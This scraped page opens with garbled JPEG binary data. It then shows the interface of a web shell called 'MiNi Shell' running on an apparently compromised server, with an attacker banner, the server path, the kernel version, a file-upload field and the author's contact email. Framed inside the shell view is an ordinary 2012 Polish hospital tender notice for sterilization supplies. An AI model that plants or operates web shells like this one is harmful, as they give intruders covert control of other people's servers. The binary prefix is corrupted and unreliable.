JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120418/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120418/87437-N-2012.html

<p class="kh_header"><b>Głogów: Dostawa materiałów zużywalnych dla potrzeb Centralnej Sterylizatorni. Znak sprawy: ZP/09/2012</b><br>
<b>Numer ogłoszenia: 87437 - 2012; data zamieszczenia: 18.04.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zespół Opieki Zdrowotnej w Głogowie , ul. Kościuszki 15, 67-200 Głogów, woj. dolnośląskie, tel. 076 8373211, faks 076 8373377.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.szpital.glogow.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa materiałów zużywalnych dla potrzeb Centralnej Sterylizatorni. Znak sprawy: ZP/09/2012.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia obejmuje dostawy akcesoriów i materiałów opakowaniowych
    zwanych dalej  materiałami zużywalnymi  dla potrzeb Centralnej Sterylizatorni.
       Przez dostawę zamawiający rozumie cykliczne dostawy w okresie trwania umowy zgodnie z zamówieniami zamawiającego dostosowanymi do jego bieżących potrzeb.
Szczegółowy opis przedmiotu zamówienia określa Specyfikacja asortymentowo -
          ilościowa (formularz cenowy),
 Przedmiot zamówienia stanowi jedno zadanie podzielone na 5 pakietów   
           Zamawiający zezwala na składanie ofert na wybrany pakiet/y (jeden lub więcej), przy
	    czym w ramach pakietu wymagany jest pełny zakres asortymentu. 
           Nie zezwala natomiast na składanie ofert na wybrane pozycje w pakietach. 
           Zamawiający zastrzega sobie prawo zakupu mniejszej ilości materiałów zużywalnych.
Przedmiot zamówienia stanowi jedno zadanie podzielone na 5 pakietów: 
Pakiet nr 1 -  materiały opakowaniowe, w tym:
                            papier krepowany w 4 rozmiarach  w kolorze zielonym i białym;
			 rękawy papierowo-foliowe w różnych rozmiarach z zakładka i bez zakładki;                            
Pakiet nr 2 - testy chemiczne i inne materiały i akcesoria używane w Sterylizacji, w tym:
			jednorazowy pakiet kontrolny typu BOWIE-DICK;
			wskaźnik skuteczności procesu sterylizacji parą wodną;
			ampułkowy wskaźnik biologiczny do kontroli procesu sterylizacji parą wodną;
			wieloparametrowy test do kontroli sterylizacji para-formaldehyd;
			test biologiczny do kontroli sterylizacji para-formaldehyd;
			taśma biała ze wskaźnikiem na parę wodną  19mm x 50m;
			taśma neutralna bez wskaźnika 19mm x 50m;
			etykiety podwójnie samoprzylepne wyposażone w test procesu sterylizacji 
                            para wodną;
			koperty do systemu dokumentacji-proces dezynfekcji-koperty dokumentacyjne 			do etykiet i wskaźników używanych do  kontroli procesu mycia i dezynfekcji 			termicznej oraz używanych w kontroli procesu sterylizacji;
			metkownica 3-rzędowa do ETS-BR;
			rękawice ochronne do autoklawów wykonane z miękkiej frotowej tkaniny 			bawełnianej;
Pakiet nr 3 - materiały opakowaniowe i testy do kontroli sterylizacji plazmowej oraz inne 
                           akcesoria, w tym:
			trzywarstwowy materiał opakowaniowy w arkuszach w kolorze niebieskim w 			dwóch rozmiarach;
			rękaw TYVEK z naniesionym wskaźnikiem sterylizacji plazmowej w różnych 			rozmiarach;
			test biologiczny CYKLE SURE;
			wieloparametrowy wskaźnik chemiczny;
			kaseta STERRAD 100S (op. = 25 cykli);
			akcesoria STERRAD 100S   (6 kartonów, 12 rolek, 3 taśmy do drukarki, 6 płytek);
			taśma ze wskaźnikiem do plazmy  (op. = 330m);




Pakiet nr 4 - środki do maszynowego mycia i dezynfekcji, w tym:
			płynny alkaliczny produkt myjący do maszynowego mycia narzędzi 					chirurgicznych, sprzętu anestezjologicznego, butów operacyjnych, butelek do 				karmienia i szkła laboratoryjnego;
			płynny środek do dezynfekcji termiczno-chemicznej w myjniach dezynfektorach;
			płynny kwaśny środek do neutralizacji pozostałości alkalicznych w procesie 				dekontaminacji maszynowej;
			płynny środek płuczący powierzchniowo-czynny zawierający środki 					konserwujące do użycia w myjniach dezynfektorach;
			środek do pielęgnacji narzędzi  (spray) 400ml ;
			preparat czyszczący do dokładnego usuwania pozostałości po taśmach i 				substancjach klejących, gipsie, alginatach i cemencie bez alkaliów i mydła;
			test do rutynowej kontroli mycia mechanicznego STF;
			test dezynfekcji termicznej  93 C/ 10 min. DES-CHECK;
Pakiet nr 5 - formalina:
			35% formalina w 400ml butelce (60 butelek/ rok).</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 33.14.10.00-0.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 5.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wnoszenia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie   
                  wyznacza szczegółowego warunku.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie   
                  wyznacza szczegółowego warunku.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie   
                  wyznacza szczegółowego warunku.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie   
                  wyznacza szczegółowego warunku.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie   
                  wyznacza szczegółowego warunku.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">Opisy, ulotki informacyjne w języku polskim (dotyczy wszystkich pakietów)
  (należy zaznaczyć nr pakietu i poz.):
	 - w odniesieniu do Pakietu nr I:
papier krepowany dołączenia dokumentów wydanych przez producenta
                        potwierdzających  spełnianie wymaganych przez zamawiającego parametrów
                        jakościowych określonych w Tabeli Wymagane parametry jakościowe  -
                        Załącznik  nr 1 do Pakietu nr I
rękawy papierowo-foliowe dołączenia dokumentów wydanych przez producenta
                        potwierdzających  spełnianie wymaganych przez zamawiającego parametrów
                        jakościowych określonych w Tabeli Wymagane parametry jakościowe  -
                        Załącznik nr 2 do Pakietu nr I;
             - w odniesieniu do Pakietu nr II:
poz. 1       -   certyfikat potwierdzający klasę 2 wydany przez niezależną
                           organizację notyfikowaną 
poz. 2       -   oświadczenie producenta o klasie testu wg ISO 11140-1 lub PN EN
                                                                                                                  ISO 15882
poz. 4       -    oświadczenie producenta o klasie testu wg ISO 11140-1 lub PN EN
                                                                                                                  ISO 15882
poz 1, 2, 4 -   dokument poświadczony przez producenta potwierdzający brak
                                               zawartości soli metali ciężkich (wydany nie wcześniej niż w 2010r.)
	 -  w odniesieniu do Pakietu nr III (część A) charakterystyka wytrzymałości materiału
                opakowaniowego wydana przez producenta, w celu potwierdzenia parametrów
                  wytrzymałościowych i zgodności z normą PN EN 868-2.</p></li>



</ul><p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Formularz oferty,
Formularz cenowy - Specyfikacja asortymentowo-ilościowa, 
Pełnomocnictwo wystawione dla osoby podpisującej ofertę - tylko w przypadku
              podpisania jej przez osobę nie uprawnioną do reprezentacji wprost z postanowień
              KRS lub ewidencji działalności gospodarczej;  
    Dokument ustanawiający pełnomocnika i upoważniający go do podpisywania oferty
             oraz reprezentowania podmiotów występujących wspólnie - tylko w przypadku
             złożenia oferty wspólnej. Przyjmuje się, że pełnomocnictwo do podpisania oferty 
             obejmuje również pełnomocnictwo do poświadczenia za zgodność z oryginałem 
             wszystkich kopii;
 Pisemne zobowiązanie innych podmiotów  (jeśli dotyczy).
  Dokumenty wymagane przez Zamawiającego i dołączone do Formularza oferty mogą 
  być przedstawione w formie oryginału, w formie kopii potwierdzonej Za zgodność z oryginałem przez uprawnione osoby. Zamawiający zaleca aby ofertę podpisano zgodnie z zasadami reprezentacji wskazanymi we właściwym rejestrze. W przypadku wykonawcy będącego osobą fizyczną i prowadzącą działalność gospodarczą, zaleca się dołączenia do oferty aktualnego zaświadczenia o wpisie do ewidencji działalności gospodarczej. 
Jeżeli osoba / osoby podpisująca ofertę działa na podstawie pełnomocnictwa, to pełnomocnictwo to musi w swej treści jednoznacznie wskazywać uprawnienie do podpisania oferty. Pełnomocnictwo to musi zostać dołączone do oferty i musi być złożone w oryginale lub kopii poświadczonej za zgodność z oryginałem przez notariusza.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający  dopuszcza możliwość dokonania zmian postanowień zawartej umowy   
              w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy w
              przypadku:
a) promocyjnych obniżek cen jednostkowych przedmiotu umowy,
b)  zmian ilościowych zamawianego przedmiotu umowy w zakresie poszczególnych  
     pozycji  asortymentowych ( w odniesieniu do każdego z pakietów) , do wysokości ogólnej wartości zastrzeżonej w umowie,
c)   zmiany numeru katalogowego  nie powodującej zmiany przedmiotu umowy,
d)   zmiany sposobu konfekcjonowania nie powodującej zmiany przedmiotu umowy,
e)  dostarczenia materiału zamiennego o parametrach nie gorszych od objętego 
     umową, w przypadku, gdy wystąpi przejściowy brak materiału z przyczyn leżących   
     po stronie producenta, za cenę nie wyższą niż cena produktu objętego umową.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.biuletyn.sbip.pl/zoz<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zespół Opieki Zdrowotnej w Głogowie, ul. KOściuszki 15, 67-200 Głogów budynek D -  Dział   Administracyjny  - zamówienia publiczne  w dni  robocze w  godzinach 
               od 7:00 do 14:00..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 26.04.2012 godzina 10:00, miejsce: Zespół Opieki Zdrowotnej w Głogowie ulica Kościuszki 15, budynek Dyrekcji - 
         kancelaria.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com